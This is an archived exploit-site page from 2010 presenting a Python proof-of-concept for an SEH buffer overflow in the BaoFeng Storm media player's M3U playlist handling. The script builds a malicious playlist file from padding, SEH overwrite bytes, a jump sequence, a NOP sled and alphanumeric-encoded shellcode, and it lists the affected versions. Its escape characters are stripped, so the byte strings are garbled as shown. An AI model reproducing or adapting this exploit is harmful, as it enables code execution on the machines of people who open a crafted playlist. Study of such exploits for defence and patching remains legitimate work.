Home / os / win7

BaoFeng Storm M3U File Processing Buffer Overflow Exploit

Posted on 06 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>BaoFeng Storm M3U File Processing Buffer Overflow Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=========================================================
BaoFeng Storm M3U File Processing Buffer Overflow Exploit
=========================================================

#!/usr/bin/env python
 
#################################################################
#
# Title: BaoFeng Storm M3U File Processing Buffer Overflow Exploit
# CNVD-ID: CNVD-2010-00752
# Download: www.baofeng.com
# Test: Put m3u file in root(e.g. c:/ d:/),and open this m3u file
# Platform: Windows XPSP3 Chinese Simplified
# Vulnerable: Storm2012 3.10.4.21
# Storm2012 3.10.4.16
# Storm2012 3.10.4.8
# Storm2012 3.10.3.17
# Storm2012 3.10.2.5
# Storm2012 3.10.1.12
#################################################################
# Code :
file= &quot;baofeng.m3u&quot;
junk =&quot;x41&quot;*795
nseh=&quot;x61xe8xe1&quot;
seh=&quot;xaaxd7x40&quot;
 
jmp =&quot;x53x53x6dx58x6dx05x11x22x6dx2dx10x22x6dxacxe4&quot;
nops =&quot;x42&quot; * 110
shellcode=(&quot;PPYAIAIAIAIAQATAXAZAPA3QADAZA&quot;
&quot;BARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA&quot;
&quot;58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABAB&quot;
&quot;AB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K&quot;
&quot;22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NL&quot;
&quot;MPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55&quot;
&quot;Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18V&quot;
&quot;NQKONQ90FLGQ8OLMKQY7NXK0T5L4M33MKHOKSMND45JB&quot;
&quot;R84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOT&quot;
&quot;NDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU&quot;
&quot;89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEM&quot;
&quot;KOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC&quot;
&quot;QQ2LRCM0LJA&quot;)
 
fobj=open(file,&quot;w&quot;)
payload=junk+nseh+seh+jmp+nops+shellcode
fobj.write(payload)
fobj.close()


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-06]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :